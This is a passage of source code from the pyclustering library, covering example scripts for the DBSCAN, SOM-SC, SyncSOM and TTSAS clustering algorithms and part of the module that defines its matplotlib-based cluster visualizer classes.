visualizer.append_clusters(atom_clusters, atom, 7)
visualizer.show()
def display_fcps_dependence_clustering_results():
(two_diamonds, two_diamonds_clusters_1, _) = template_clustering(0.15, 4, FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, False, True, False)
(two_diamonds, two_diamonds_clusters_2, _) = template_clustering(0.15, 5, FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, False, True, False)
(two_diamonds, two_diamonds_clusters_3, _) = template_clustering(0.15, 6, FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, False, True, False)
(two_diamonds, two_diamonds_clusters_4, _) = template_clustering(0.15, 7, FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, False, True, False)
(two_diamonds, two_diamonds_clusters_5, _) = template_clustering(0.10, 6, FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, False, True, False)
(two_diamonds, two_diamonds_clusters_6, _) = template_clustering(0.12, 6, FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, False, True, False)
(two_diamonds, two_diamonds_clusters_7, _) = template_clustering(0.15, 6, FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, False, True, False)
(two_diamonds, two_diamonds_clusters_8, _) = template_clustering(0.17, 6, FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, False, True, False)
visualizer = cluster_visualizer(8, 4)
visualizer.append_clusters(two_diamonds_clusters_1, two_diamonds, 0)
visualizer.append_clusters(two_diamonds_clusters_2, two_diamonds, 1)
visualizer.append_clusters(two_diamonds_clusters_3, two_diamonds, 2)
visualizer.append_clusters(two_diamonds_clusters_4, two_diamonds, 3)
visualizer.append_clusters(two_diamonds_clusters_5, two_diamonds, 4)
visualizer.append_clusters(two_diamonds_clusters_6, two_diamonds, 5)
visualizer.append_clusters(two_diamonds_clusters_7, two_diamonds, 6)
visualizer.append_clusters(two_diamonds_clusters_8, two_diamonds, 7)
visualizer.show()
def clustering_random_points(amount, ccore):
sample = [ [ random.random(), random.random() ] for _ in range(amount) ]
dbscan_instance = dbscan(sample, 0.05, 20, ccore)
(ticks, _) = timedcall(dbscan_instance.process)
print("Execution time ("+ str(amount) +" 2D-points):", ticks)
def performance_measure_random_points(ccore):
clustering_random_points(1000, ccore)
clustering_random_points(2000, ccore)
clustering_random_points(3000, ccore)
clustering_random_points(4000, ccore)
clustering_random_points(5000, ccore)
clustering_random_points(10000, ccore)
clustering_random_points(20000, ccore)
cluster_sample1()
cluster_sample2()
cluster_sample3()
cluster_sample4()
cluster_sample5()
cluster_sample7()
cluster_sample8()
cluster_elongate()
cluster_lsun()
cluster_target()
cluster_two_diamonds()
cluster_wing_nut()
cluster_chainlink()
cluster_hepta()
cluster_golf_ball() # it is commented due to long time of processing - it's working absolutely correct!
cluster_atom()
cluster_tetra()
cluster_engy_time()
experiment_execution_time(False) # Python code
experiment_execution_time(True) # C++ code + Python env.
display_fcps_clustering_results()
display_fcps_dependence_clustering_results()
performance_measure_random_points(False)
performance_measure_random_points(True)
```
#### File: cluster/examples/somsc_examples.py
```python
from pyclustering.samples.definitions import SIMPLE_SAMPLES, FCPS_SAMPLES;
from pyclustering.cluster import cluster_visualizer;
from pyclustering.cluster.somsc import somsc;
from pyclustering.utils import read_sample;
from pyclustering.utils import timedcall;
def template_clustering(path, amount_clusters, epouch = 100, ccore = True):
sample = read_sample(path);
somsc_instance = somsc(sample, amount_clusters, epouch, ccore);
(ticks, _) = timedcall(somsc_instance.process);
clusters = somsc_instance.get_clusters();
print("Sample: ", path, "\t\tExecution time: ", ticks, "\n");
visualizer = cluster_visualizer();
visualizer.append_clusters(clusters, sample);
visualizer.show();
def cluster_sample1():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2);
def cluster_sample2():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 3);
def cluster_sample3():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 4);
def cluster_sample4():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE4, 5);
def cluster_sample5():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, 6);
def cluster_elongate():
template_clustering(SIMPLE_SAMPLES.SAMPLE_ELONGATE, 2);
def cluster_lsun():
template_clustering(FCPS_SAMPLES.SAMPLE_LSUN, 3);
def cluster_target():
template_clustering(FCPS_SAMPLES.SAMPLE_TARGET, 6);
def cluster_two_diamonds():
template_clustering(FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, 2);
def cluster_wing_nut():
template_clustering(FCPS_SAMPLES.SAMPLE_WING_NUT, 2);
def cluster_chainlink():
template_clustering(FCPS_SAMPLES.SAMPLE_CHAINLINK, 2);
def cluster_hepta():
template_clustering(FCPS_SAMPLES.SAMPLE_HEPTA, 7);
def cluster_tetra():
template_clustering(FCPS_SAMPLES.SAMPLE_TETRA, 4);
def cluster_engy_time():
template_clustering(FCPS_SAMPLES.SAMPLE_ENGY_TIME, 2);
cluster_sample1();
cluster_sample2();
cluster_sample3();
cluster_sample4();
cluster_sample5();
cluster_elongate();
cluster_lsun();
cluster_target();
cluster_two_diamonds();
cluster_wing_nut();
cluster_chainlink();
cluster_hepta();
cluster_tetra();
cluster_engy_time();
```
#### File: cluster/examples/syncsom_examples.py
```python
from random import random
from pyclustering.cluster import cluster_visualizer
from pyclustering.cluster.syncsom import syncsom
from pyclustering.samples.definitions import SIMPLE_SAMPLES
from pyclustering.samples.definitions import FCPS_SAMPLES
from pyclustering.utils import read_sample, draw_dynamics
from pyclustering.utils import timedcall
def template_clustering(file, map_size, radius, sync_order = 0.999, show_dyn = False, show_layer1 = False, show_layer2 = False, show_clusters = True):
# Read sample
sample = read_sample(file)
# Create network
network = syncsom(sample, map_size[0], map_size[1], radius)
# Run processing
(ticks, (dyn_time, dyn_phase)) = timedcall(network.process, show_dyn, sync_order)
print("Sample: ", file, "\t\tExecution time: ", ticks, "\n")
# Show dynamic of the last layer.
if show_dyn is True:
draw_dynamics(dyn_time, dyn_phase, x_title = "Time", y_title = "Phase", y_lim=[0, 3.14])
if show_clusters is True:
clusters = network.get_som_clusters()
visualizer = cluster_visualizer()
visualizer.append_clusters(clusters, network.som_layer.weights)
visualizer.show()
# Show network stuff.
if show_layer1 is True:
network.show_som_layer()
if show_layer2 is True:
network.show_sync_layer()
if show_clusters is True:
clusters = network.get_clusters()
visualizer = cluster_visualizer()
visualizer.append_clusters(clusters, sample)
visualizer.show()
def cluster_simple1():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [4, 4], 1.0, 0.999, True, True, True, True)
def cluster_simple1_as_som():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [1, 2], 1.0, 0.999, True, True, True, True)
def cluster_simple2():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, [4, 4], 1.0, 0.999, True, True, True, True)
def cluster_simple2_as_som():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, [1, 3], 1.0, 0.999, True, True, True, True)
def cluster_simple3():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, [5, 5], 1.0, 0.999, True, True, True, True)
def cluster_simple4():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE4, [5, 5], 1.0, 0.999, True, True, True)
def cluster_simple5():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, [5, 5], 1.0, 0.999, True, True, True)
def cluster_lsun():
template_clustering(FCPS_SAMPLES.SAMPLE_LSUN, [9, 9], 0.45, 0.999, True, True, True)
def cluster_target():
template_clustering(FCPS_SAMPLES.SAMPLE_TARGET, [9, 9], 0.9, 0.999, True, True, True)
def cluster_two_diamonds():
template_clustering(FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, [10, 10], 0.15, 0.999, True, True, True)
def cluster_wing_nut():
template_clustering(FCPS_SAMPLES.SAMPLE_WING_NUT, [10, 10], 0.25, 0.999, True, True, True)
def cluster_chainlink():
template_clustering(FCPS_SAMPLES.SAMPLE_CHAINLINK, [10, 10], 0.5, 0.999, True, True, True)
def cluster_hepta():
template_clustering(FCPS_SAMPLES.SAMPLE_HEPTA, [7, 7], 1.0, 0.999, True, True, True)
def cluster_tetra():
template_clustering(FCPS_SAMPLES.SAMPLE_TETRA, [7, 7], 0.4, 0.998, True, True, True)
def experiment_execution_time():
template_clustering(FCPS_SAMPLES.SAMPLE_LSUN, [4, 4], 0.45, 0.999, False, False, False, False)
template_clustering(FCPS_SAMPLES.SAMPLE_TARGET, [4, 4], 0.9, 0.998, False, False, False, False)
template_clustering(FCPS_SAMPLES.SAMPLE_WING_NUT, [4, 4], 0.25, 0.999, False, False, False, False)
template_clustering(FCPS_SAMPLES.SAMPLE_CHAINLINK, [4, 4], 0.5, 0.998, False, False, False, False)
template_clustering(FCPS_SAMPLES.SAMPLE_TETRA, [4, 4], 0.4, 0.998, False, False, False, False)
template_clustering(FCPS_SAMPLES.SAMPLE_HEPTA, [6, 6], 1.0, 0.998, False, False, False, False)
template_clustering(FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, [4, 4], 0.15, 0.998, False, False, False, False)
template_clustering(FCPS_SAMPLES.SAMPLE_ATOM, [4, 4], 15, 0.998, False, False, False, False)
def experiment_execution_one_cluster_dependence(layer_first_size, radius, order):
print("Experiment: map size =", layer_first_size[0] * layer_first_size[1], "radius =", radius, "order =", order)
cluster_sizes = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150]
for cluster_size in cluster_sizes:
# generate data sets
dataset = []
dataset += [ [random(), random()] for _ in range(cluster_size) ]
general_value = 0.0
amount_attempt = 5
for _ in range(amount_attempt):
network = syncsom(dataset, layer_first_size[0], layer_first_size[1], radius)
(ticks, (dyn_time, dyn_phase)) = timedcall(network.process, False, order)
general_value += ticks
print("Sample: ", cluster_size, "\t\tExecution time: ", general_value / float(amount_attempt))
print("\n")
cluster_simple1()
cluster_simple1_as_som()
cluster_simple2()
cluster_simple2_as_som()
cluster_simple3()
cluster_simple4()
cluster_simple5()
cluster_lsun()
cluster_target()
cluster_two_diamonds()
cluster_chainlink()
cluster_hepta()
cluster_tetra()
experiment_execution_time()
experiment_execution_one_cluster_dependence([5, 5], 0.6, 0.998)
experiment_execution_one_cluster_dependence([6, 6], 0.6, 0.998)
experiment_execution_one_cluster_dependence([7, 7], 0.6, 0.998)
experiment_execution_one_cluster_dependence([8, 8], 0.6, 0.998)
experiment_execution_one_cluster_dependence([9, 9], 0.6, 0.998)
experiment_execution_one_cluster_dependence([10, 10], 0.6, 0.998)
```
#### File: cluster/examples/ttsas_examples.py
```python
from pyclustering.cluster.bsas import bsas_visualizer;
from pyclustering.cluster.ttsas import ttsas;
from pyclustering.samples.definitions import SIMPLE_SAMPLES, FCPS_SAMPLES;
from pyclustering.utils import read_sample;
from pyclustering.utils.metric import distance_metric, type_metric;
def template_clustering(path, threshold1, threshold2, **kwargs):
metric = kwargs.get('metric', distance_metric(type_metric.EUCLIDEAN_SQUARE));
ccore = kwargs.get('ccore', False);
draw = kwargs.get('draw', True);
sample = read_sample(path);
print("Sample: ", path);
ttsas_instance = ttsas(sample, threshold1, threshold2, ccore=ccore, metric=metric);
ttsas_instance.process();
clusters = ttsas_instance.get_clusters();
representatives = ttsas_instance.get_representatives();
if draw is True:
bsas_visualizer.show_clusters(sample, clusters, representatives);
def cluster_sample1():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 1.0, 2.0);
def cluster_sample2():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 1.0, 2.0);
def cluster_sample3():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 1.0, 2.0);
def cluster_sample4():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE4, 1.0, 2.0);
def cluster_sample5():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, 1.0, 2.0);
def cluster_sample6():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE6, 1.0, 2.0);
def cluster_elongate():
template_clustering(SIMPLE_SAMPLES.SAMPLE_ELONGATE, 1.0, 2.0);
def cluster_two_diamonds():
template_clustering(FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, 1.0, 2.0);
cluster_sample1();
cluster_sample2();
cluster_sample3();
cluster_sample4();
cluster_sample5();
cluster_sample6();
cluster_elongate();
cluster_two_diamonds();
```
#### File: pyclustering/cluster/__init__.py
```python
import itertools
import math
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
from mpl_toolkits.mplot3d import Axes3D
from pyclustering.utils.color import color as color_list
class canvas_cluster_descr:
"""!
@brief Description of cluster for representation on canvas.
"""
def __init__(self, cluster, data, marker, markersize, color):
"""!
@brief Constructor of cluster representation on the canvas.
@param[in] cluster (array_like): Single cluster that consists of objects or indexes from data.
@param[in] data (array_like): Objects that should be displayed, can be None if clusters consist of objects instead of indexes.
@param[in] marker (string): Type of marker that is used for drawing objects.
@param[in] markersize (uint): Size of marker that is used for drawing objects.
@param[in] color (string): Color of the marker that is used for drawing objects.
"""
## Cluster that may consist of objects or indexes of objects from data.
self.cluster = cluster
## Data where objects are stored. It can be None if clusters consist of objects instead of indexes.
self.data = data
## Marker that is used for drawing objects.
self.marker = marker
## Size of marker that is used for drawing objects.
self.markersize = markersize
## Color that is used for coloring marker.
self.color = color
## Attribures of the clusters - additional collections of data points that are regarded to the cluster.
self.attributes = []
class cluster_visualizer_multidim:
"""!
@brief Visualizer for cluster in multi-dimensional data.
@details Multi-dimensional cluster visualizer is useful data whose dimension is greater than three, but it
is able to visualize data with any dimensions. The multidimensional visualizer helps to overcome
'cluster_visualizer' shortcoming - an ability to display clusters in 1D, 2D or 3D dimensional data
space only.
Example of clustering results visualization where `Iris` is used:
@code
from pyclustering.utils import read_sample
from pyclustering.samples.definitions import FAMOUS_SAMPLES
from pyclustering.cluster import cluster_visualizer_multidim
from pyclustering.cluster.center_initializer import kmeans_plusplus_initializer
from pyclustering.cluster.xmeans import xmeans
# load 4D data sample 'Iris'
sample_4d = read_sample(FAMOUS_SAMPLES.SAMPLE_IRIS)
# initialize 3 initial centers using K-Means++ algorithm
centers = kmeans_plusplus_initializer(sample_4d, 3).initialize()
# performs cluster analysis using X-Means
xmeans_instance = xmeans(sample_4d, centers)
xmeans_instance.process()
clusters = xmeans_instance.get_clusters()
# visualize obtained clusters in multi-dimensional space
visualizer = cluster_visualizer_multidim()
visualizer.append_clusters(clusters, sample_4d)
visualizer.show(max_row_size=3)
@endcode
Visualized clustering results of `Iris` data (multi-dimensional data):
@image html xmeans_clustering_famous_iris.png "Fig. 1. X-Means clustering results (data 'Iris')."
Sometimes no need to display results in all dimensions. Parameter `filter` can be used to display only
interesting coordinate pairs. Here is an example of visualization of pair coordinates (x0, x1) and (x0, x2) for
previous clustering results:
@code
visualizer = cluster_visualizer_multidim()
visualizer.append_clusters(clusters, sample_4d)
visualizer.show(pair_filter=[[0, 1], [0, 2]])
@endcode
Visualized results of specified coordinate pairs:
@image html xmeans_clustering_famous_iris_filtered.png "Fig. 2. X-Means clustering results (x0, x1) and (x0, x2) (data 'Iris')."
The multi-dimensional visualizer can be used to display clusters in 1-, 2- and 3-dimensional data similar to
`cluster_visualizer`. `cluster_visualizer_multidim` uses three plots to display 3-dimensional data:
`(x0, x1)`, `(x0, x2)` and `(x1, x2)`. There is an example:
@code
from pyclustering.utils import read_sample
from pyclustering.samples.definitions import FCPS_SAMPLES
from pyclustering.cluster import cluster_visualizer_multidim
from pyclustering.cluster.gmeans import gmeans
# load 3-dimensional data sample 'Hepta'
sample_3d = read_sample(FCPS_SAMPLES.SAMPLE_HEPTA)
# performs cluster analysis using G-Means algorithm
gmeans_instance = gmeans(sample_3d).process().get_clusters()
# visualize obtained clusters in 3-dimensional space (x0, x1), (x0, x2), (x1, x2):
visualizer = cluster_visualizer_multidim()
visualizer.append_clusters(clusters, sample_3d)
visualizer.show(max_row_size=3)
@endcode
Visualized clustering results of `Hepta` data (3-dimensional data):
@image html gmeans_hepta_multidim_visualizer.png "Fig. 3. G-Means clustering results (3-dimensional data 'Hepta')."
Example with 2-dimensional data `Lsun`:
@code
# load 2-dimensional data sample 'Lsun'
sample_2d = read_sample(FCPS_SAMPLES.SAMPLE_LSUN)
clusters = gmeans(sample_2d).process().get_clusters()
# visualize obtained clusters in 2-dimensional space (x0, x1):
visualizer = cluster_visualizer_multidim()
visualizer.append_clusters(clusters, sample_2d)
visualizer.show()
@endcode
Visualized clustering results of `Lsun` (2-dimensional data):
@image html gmeans_lsun_multidim_visualizer.png "Fig. 4. G-Means clustering results (2-dimensional data 'Lsun')."
"""
def __init__(self):
"""!
@brief Constructs cluster visualizer for multidimensional data.
@details The visualizer is suitable more data whose dimension is bigger than 3.
"""
self.__clusters = []
self.__figure = None
self.__grid_spec = None
def __del__(self):
"""!
@brief Close matplotlib figure that was used for visualization.
"""
if self.__figure is not None:
plt.close(self.__figure)
def append_cluster(self, cluster, data=None, marker='.', markersize=None, color=None):
"""!
@brief Appends cluster for visualization.
@param[in] cluster (array_like): cluster that may consist of indexes of objects from the data or object itself.
@param[in] data (array_like): If defines that each element of cluster is considered as a index of object from the data.
@param[in] marker (string): Marker that is used for displaying objects from cluster on the canvas.
@param[in] markersize (uint): Size of marker.
@param[in] color (string): Color of marker.
@return Returns index of cluster descriptor on the canvas.
"""
if len(cluster) == 0:
raise ValueError("Empty cluster is provided.")
markersize = markersize or 5
if color is None:
index_color = len(self.__clusters) % len(color_list.TITLES)
color = color_list.TITLES[index_color]
cluster_descriptor = canvas_cluster_descr(cluster, data, marker, markersize, color)
self.__clusters.append(cluster_descriptor)
def append_clusters(self, clusters, data=None, marker='.', markersize=None):
"""!
@brief Appends list of cluster for visualization.
@param[in] clusters (array_like): List of clusters where each cluster may consist of indexes of objects from the data or object itself.
@param[in] data (array_like): If defines that each element of cluster is considered as a index of object from the data.
@param[in] marker (string): Marker that is used for displaying objects from clusters on the canvas.
@param[in] markersize (uint): Size of marker.
"""
for cluster in clusters:
self.append_cluster(cluster, data, marker, markersize)
def save(self, filename, **kwargs):
"""!
@brief Saves figure to the specified file.
@param[in] filename (string): File where the visualized clusters should be stored.
@param[in] **kwargs: Arbitrary keyword arguments (available arguments: 'visible_axis' 'visible_labels', 'visible_grid', 'row_size', 'show').
<b>Keyword Args:</b><br>
- visible_axis (bool): Defines visibility of axes on each canvas, if True - axes are visible.
By default axis of each canvas are not displayed.
- visible_labels (bool): Defines visibility of labels on each canvas, if True - labels is displayed.
By default labels of each canvas are displayed.
- visible_grid (bool): Defines visibility of grid on each canvas, if True - grid is displayed.
By default grid of each canvas is displayed.
- max_row_size (uint): Maximum number of canvases on one row.
"""
if len(filename) == 0:
raise ValueError("Impossible to save visualization to file: empty file path is specified.")
self.show(None,
visible_axis=kwargs.get('visible_axis', False),
visible_labels=kwargs.get('visible_labels', True),
visible_grid=kwargs.get('visible_grid', True),
max_row_size=kwargs.get('max_row_size', 4))
plt.savefig(filename)
def show(self, pair_filter=None, **kwargs):
"""!
@brief Shows clusters (visualize) in multi-dimensional space.
@param[in] pair_filter (list): List of coordinate pairs that should be displayed. This argument is used as a filter.
@param[in] **kwargs: Arbitrary keyword arguments (available arguments: 'visible_axis' 'visible_labels', 'visible_grid', 'row_size', 'show').
<b>Keyword Args:</b><br>
- visible_axis (bool): Defines visibility of axes on each canvas, if True - axes are visible.
By default axis of each canvas are not displayed.
- visible_labels (bool): Defines visibility of labels on each canvas, if True - labels is displayed.
By default labels of each canvas are displayed.
- visible_grid (bool): Defines visibility of grid on each canvas, if True - grid is displayed.
By default grid of each canvas is displayed.
- max_row_size (uint): Maximum number of canvases on one row. By default the maximum value is 4.
- show (bool): If True - then displays visualized clusters. By default is `True`.
"""
if not len(self.__clusters) > 0:
raise ValueError("There is no non-empty clusters for visualization.")
if self.__clusters[0].data is not None:
cluster_data = self.__clusters[0].data
else:
cluster_data = self.__clusters[0].cluster
dimension = len(cluster_data[0])
acceptable_pairs = pair_filter or []
pairs = []
amount_axis = 1
axis_storage = []
if dimension > 1:
pairs = self.__create_pairs(dimension, acceptable_pairs)
amount_axis = len(pairs)
self.__figure = plt.figure()
self.__grid_spec = self.__create_grid_spec(amount_axis, kwargs.get('max_row_size', 4))
for index in range(amount_axis):
ax = self.__create_canvas(dimension, pairs, index, **kwargs)
axis_storage.append(ax)
for cluster_descr in self.__clusters:
self.__draw_canvas_cluster(axis_storage, cluster_descr, pairs)
if kwargs.get('show', True):
plt.show()
def __create_grid_spec(self, amount_axis, max_row_size):
"""!
@brief Create grid specification for figure to place canvases.
@param[in] amount_axis (uint): Amount of canvases that should be organized by the created grid specification.
@param[in] max_row_size (max_row_size): Maximum number of canvases on one row.
@return (gridspec.GridSpec) Grid specification to place canvases on figure.
"""
row_size = amount_axis
if row_size > max_row_size:
row_size = max_row_size
col_size = math.ceil(amount_axis / row_size)
return gridspec.GridSpec(col_size, row_size)
def __create_pairs(self, dimension, acceptable_pairs):
"""!
@brief Create coordinate pairs that should be displayed.
@param[in] dimension (uint): Data-space dimension.
@param[in] acceptable_pairs (list): List of coordinate pairs that should be displayed.
@return (list) List of coordinate pairs that should be displayed.
"""
if len(acceptable_pairs) > 0:
return acceptable_pairs
return list(itertools.combinations(range(dimension), 2))
def __create_canvas(self, dimension, pairs, position, **kwargs):
"""!
@brief Create new canvas with user defined parameters to display cluster or chunk of cluster on it.
@param[in] dimension (uint): Data-space dimension.
@param[in] pairs (list): Pair of coordinates that will be displayed on the canvas. If empty than label will not
be displayed on the canvas.
@param[in] position (uint): Index position of canvas on a grid.
@param[in] **kwargs: Arbitrary keyword arguments (available arguments: 'visible_axis' 'visible_labels', 'visible_grid').
<b>Keyword Args:</b><br>
- visible_axis (bool): Defines visibility of axes on each canvas, if True - axes are visible.
By default axis are not displayed.
- visible_labels (bool): Defines visibility of labels on each canvas, if True - labels is displayed.
By default labels are displayed.
- visible_grid (bool): Defines visibility of grid on each canvas, if True - grid is displayed.
By default grid is displayed.
@return (matplotlib.Axis) Canvas to display cluster of chuck of cluster.
"""
visible_grid = kwargs.get('visible_grid', True)
visible_labels = kwargs.get('visible_labels', True)
visible_axis = kwargs.get('visible_axis', False)
ax = self.__figure.add_subplot(self.__grid_spec[position])
if dimension > 1:
if visible_labels:
ax.set_xlabel("x%d" % pairs[position][0])
ax.set_ylabel("x%d" % pairs[position][1])
else:
ax.set_ylim(-0.5, 0.5)
ax.set_yticklabels([])
if visible_grid:
ax.grid(True)
if not visible_axis:
ax.set_yticklabels([])
ax.set_xticklabels([])
return ax
def __draw_canvas_cluster(self, axis_storage, cluster_descr, pairs):
"""!
@brief Draw clusters.
@param[in] axis_storage (list): List of matplotlib axis where cluster dimensional chunks are displayed.
@param[in] cluster_descr (canvas_cluster_descr): Canvas cluster descriptor that should be displayed.
@param[in] pairs (list): List of coordinates that should be displayed.
"""
for index_axis in range(len(axis_storage)):
for item in cluster_descr.cluster:
if len(pairs) > 0:
self.__draw_cluster_item_multi_dimension(axis_storage[index_axis], pairs[index_axis], item, cluster_descr)
else:
self.__draw_cluster_item_one_dimension(axis_storage[index_axis], item, cluster_descr)
def __draw_cluster_item_multi_dimension(self, ax, pair, item, cluster_descr):
"""!
@brief Draw cluster chunk defined by pair coordinates in data space with dimension greater than 1.
@param[in] ax (axis): Matplotlib axis that is used to display chunk of cluster point.
@param[in] pair (list): Coordinate of the point that should be displayed.
@param[in] item (array_like): Data point or index of data point.
@param[in] cluster_descr (canvas_cluster_descr): Cluster description whose point is visualized.
"""
index_dimension1 = pair[0]
index_dimension2 = pair[1]
if cluster_descr.data is None:
ax.plot(item[index_dimension1], item[index_dimension2],
color=cluster_descr.color, marker=cluster_descr.marker, markersize=cluster_descr.markersize)
else:
ax.plot(cluster_descr.data[item][index_dimension1], cluster_descr.data[item][index_dimension2],
color=cluster_descr.color, marker=cluster_descr.marker, markersize=cluster_descr.markersize)
def __draw_cluster_item_one_dimension(self, ax, item, cluster_descr):
"""!
@brief Draw cluster point in one dimensional data space..
@param[in] ax (axis): Matplotlib axis that is used to display chunk of cluster point.
@param[in] item (array_like): Data point or index of data point.
@param[in] cluster_descr (canvas_cluster_descr): Cluster description whose point is visualized.
"""
if cluster_descr.data is None:
ax.plot(item[0], 0.0,
color=cluster_descr.color, marker=cluster_descr.marker, markersize=cluster_descr.markersize)
else:
ax.plot(cluster_descr.data[item][0], 0.0,
color=cluster_descr.color, marker=cluster_descr.marker, markersize=cluster_descr.markersize)
class cluster_visualizer:
"""!
@brief Common cluster visualizer for 1-, 2- and 3-dimensional data.
@details `cluster_visualizer_multidim` visualizer can be used to display clusters in N-dimensional data.
The general difference between `cluster_visualizer` and `cluster_visualizer_multidim` is a way of representation
of 3-dimensional data. In case of `cluster_visualizer` 3-dimensional data is displayed in 3-dimensional plot with
`x0`, `x1` and `x2` axis. In case of `cluster_visualizer_multidim` it displayed on three 2-dimensional plots:
`(x0, x1)`, `(x0, x2)` and `(x1, x2)`.
There is an example where sample `Atom` is used for clustering and displayed by `cluster_visualizer`:
@code
from pyclustering.utils import read_sample
from pyclustering.samples.definitions import FCPS_SAMPLES
from pyclustering.cluster import cluster_visualizer
from pyclustering.cluster.dbscan import dbscan
sample = read_sample(FCPS_SAMPLES.SAMPLE_ATOM)
clusters = dbscan(sample, 15, 3).process().get_clusters()
visualizer = cluster_visualizer()
visualizer.append_clusters(clusters, sample)
visualizer.show()
@endcode
Visualized clustering results of `Atom` data:
@image html dbscan_atom_visualizer.png "Fig. 1. DBSCAN clustering results (3-dimensional data 'Atom')."
@see cluster_visualizer_multidim
"""
def __init__(self, number_canvases=1, size_row=1, titles=None):
"""!
@brief Constructor of cluster visualizer.
@param[in] number_canvases (uint): Number of canvases that is used for visualization.
@param[in] size_row (uint): Amount of canvases that can be placed in one row.
@param[in] titles (list): List of canvas's titles.
Example:
@code
# load 2D data sample
sample_2d = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE1);
# load 3D data sample
sample_3d = read_sample(FCPS_SAMPLES.SAMPLE_HEPTA);
# extract clusters from the first sample using DBSCAN algorithm
dbscan_instance = dbscan(sample_2d, 0.4, 2, False);
dbscan_instance.process();
clusters_sample_2d = dbscan_instance.get_clusters();
# extract clusters from the second sample using DBSCAN algorithm
dbscan_instance = dbscan(sample_3d, 1, 3, True);
dbscan_instance.process();
clusters_sample_3d = dbscan_instance.get_clusters();
# create plot with two canvases where each row contains 2 canvases.
size = 2;
row_size = 2;
visualizer = cluster_visualizer(size, row_size);
# place clustering result of sample_2d to the first canvas
visualizer.append_clusters(clusters_sample_2d, sample_2d, 0, markersize = 5);
# place clustering result of sample_3d to the second canvas
visualizer.append_clusters(clusters_sample_3d, sample_3d, 1, markersize = 30);
# show plot
visualizer.show();
@endcode
"""
self.__number_canvases = number_canvases
self.__size_row = size_row
self.__canvas_clusters = [ [] for _ in range(number_canvases) ]
self.__canvas_dimensions = [ None for _ in range(number_canvases) ]
self.__canvas_titles = [ None for _ in range(number_canvases) ]
if titles is not None:
self.__canvas_titles = titles
self.__default_2d_marker_size = 5
self.__default_3d_marker_size = 30
def append_cluster(self, cluster, data=None, canvas=0, marker='.', markersize=None, color=None):
"""!
@brief Appends cluster to canvas for drawing.
@param[in] cluster (array_like): cluster that may consist of indexes of objects from the data or object itself.
@param[in] data (array_like): If defines that each element of cluster is considered as a index of object from the data.
@param[in] canvas (uint): Number of canvas that should be used for displaying cluster.
@param[in] marker (string): Marker that is used for displaying objects from cluster on the canvas.
@param[in] markersize (uint): Size of marker.
@param[in] color (string): Color of marker.
@return Returns index of cluster descriptor on the canvas.
"""
if len(cluster) == 0:
return
if canvas > self.__number_canvases or canvas < 0:
raise ValueError("Canvas index '%d' is out of range [0; %d]." % self.__number_canvases or canvas)
if color is None:
index_color = len(self.__canvas_clusters[canvas]) % len(color_list.TITLES)
color = color_list.TITLES[index_color]
added_canvas_descriptor = canvas_cluster_descr(cluster, data, marker, markersize, color)
self.__canvas_clusters[canvas].append(added_canvas_descriptor)
if data is None:
dimension = len(cluster[0])
if self.__canvas_dimensions[canvas] is None:
self.__canvas_dimensions[canvas] = dimension
elif self.__canvas_dimensions[canvas] != dimension:
raise ValueError("Only clusters with the same dimension of objects can be displayed on canvas.")
else:
dimension = len(data[0])
if self.__canvas_dimensions[canvas] is None:
self.__canvas_dimensions[canvas] = dimension
elif self.__canvas_dimensions[canvas] != dimension:
raise ValueError("Only clusters with the same dimension of objects can be displayed on canvas.")
if (dimension < 1) or (dimension > 3):
raise ValueError("Only 1-, 2- and 3-dimensional data can be displayed. Please, use "
"'cluster_visualizer_multidim' for visualization.")
if markersize is None:
if (dimension == 1) or (dimension == 2):
added_canvas_descriptor.markersize = self.__default_2d_marker_size
elif dimension == 3:
added_canvas_descriptor.markersize = self.__default_3d_marker_size
return len(self.__canvas_clusters[canvas]) - 1
def append_cluster_attribute(self, index_canvas, index_cluster, data, marker=None, markersize=None):
"""!
@brief Append cluster attribure for cluster on specific canvas.
@details Attribute it is data that is visualized for specific cluster using its color, marker and markersize if last two is not specified.
@param[in] index_canvas (uint): Index canvas where cluster is located.
@param[in] index_cluster (uint): Index cluster whose attribute should be added.
@param[in] data (array_like): List of points (data) that represents attribute.
@param[in] marker (string): Marker that is used for displaying objects from cluster on the canvas.
@param[in] markersize (uint): Size of marker.
"""
cluster_descr = self.__canvas_clusters[index_canvas][index_cluster]
attribute_marker = marker
if attribute_marker is None:
attribute_marker = cluster_descr.marker
attribure_markersize = markersize
if attribure_markersize is None:
attribure_markersize = cluster_descr.markersize
attribute_color = cluster_descr.color
